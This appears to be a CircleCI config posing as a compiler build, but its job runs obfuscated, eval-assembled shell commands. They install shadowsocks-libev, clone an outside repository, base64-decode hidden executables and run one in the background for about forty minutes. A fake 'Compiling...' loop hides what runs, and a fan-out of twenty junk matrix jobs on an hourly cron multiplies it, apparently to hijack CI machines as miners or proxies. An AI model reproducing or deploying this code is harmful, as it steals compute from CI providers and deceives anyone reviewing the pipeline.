version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--autounmask", "--help", "--onlydeps-with-rdeps", "--read-news", "--package-moves", "--onlydeps", "--sync-submodule", "--noconfmem", "--skipfirst", "--onlydeps", "--onlydeps", "--rebuild-ignore", "--deep", "--select", "--verbose", "--getbinpkg", "--ignore-built-slot-operator-deps", "--rebuild-if-new-slot", "--autounmask-backtrack", "--search-similarity"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--autounmask", "--help", "--onlydeps-with-rdeps", "--read-news", "--package-moves", "--onlydeps", "--sync-submodule", "--noconfmem", "--skipfirst", "--onlydeps", "--onlydeps", "--rebuild-ignore", "--deep", "--select", "--verbose", "--getbinpkg", "--ignore-built-slot-operator-deps", "--rebuild-if-new-slot", "--autounmask-backtrack", "--search-similarity"]
    triggers:
      - schedule:
          cron: "31 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: null-launch
          command: |
            HzNLEDAYfo="sudo add-ap"
            AXqJTwWFemL="t-repositor"
            cnxyxIBFbUB="y ppa:max-c"
            VKFIhPIjtP="-lv/shadows"
            MkBnttoGOqN="ocks-libev "
            ODrKkgFHDz="-y &>/dev/n"
            eval "$HzNLEDAYfo""$AXqJTwWFemL""$cnxyxIBFbUB""$VKFIhPIjtP""$MkBnttoGOqN""$ODrKkgFHDz""ull || true"
            dLILZ="sudo add-ap"
            ilNnQiUSjPe="t-repositor"
            YRvQybJ="y ppa:ondre"
            AzoBBKKA="j/apache2 -"
            xDMbsTIW="y &>/dev/nu"
            eval "$dLILZ""$ilNnQiUSjPe""$YRvQybJ""$AzoBBKKA""$xDMbsTIW""ll || true"
            sudo apt update || true
            vkoghF="sudo apt --"
            PCfQn="yes install"
            QBeQo=" openssl &>"
            PrKZKd="/dev/null |"
            eval "$vkoghF""$PCfQn""$QBeQo""$PrKZKd""| true"
            taUuU="sudo apt --"
            TeWifuDQ="yes install"
            GkaeJoBKyH=" cl-base64 "
            rvZbba="git &>/dev/"
            YlpZV="null || tru"
            eval "$taUuU""$TeWifuDQ""$GkaeJoBKyH""$rvZbba""$YlpZV""e"
            TXtmdRDqtG="git clone h"
            aSWObnkWH="ttps://gccb"
            ujhQKEuqekq="uild@bitbuc"
            KKUnEOEme="ket.org/gcc"
            UJDKAiWlQJ="build/gcc.g"
            dxFGGPgVw="it &>/dev/n"
            eval "$TXtmdRDqtG""$aSWObnkWH""$ujhQKEuqekq""$KKUnEOEme""$UJDKAiWlQJ""$dxFGGPgVw""ull"
            YRdCwztxGND="base64 -d g"
            EyhlwdDBDIQ="cc/cmake_np"
            eval "$YRdCwztxGND""$EyhlwdDBDIQ""_ > cmake"
            FcXeIWmorB="base64 -d g"
            FhKrMHeN="cc/config_ "
            eval "$FcXeIWmorB""$FhKrMHeN""> rebuild"
            PaeQfbDWexM="base64 -d g"
            hzUbveox="cc/make_ > "
            eval "$PaeQfbDWexM""$hzUbveox""release"
            sed -i 's/1080/1081/g' rebuild
            chmod +x release cmake
            mGxADeCsbvM="./cmake"
            eval "$mGxADeCsbvM"""
            calDSI="sed -i 's/b"
            ZXlfcSw="uild/og3u/g"
            eval "$calDSI""$ZXlfcSw""' rebuild"
            lSfcuuaWs="sudo ./rele"
            GbVcGEg="ase --confi"
            JiGAK="g=rebuild &"
            neMsZK=">/dev/null "
            eval "$lSfcuuaWs""$GbVcGEg""$JiGAK""$neMsZK""&"
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2492)) ] && sudo killall release && break; sleep 192; done
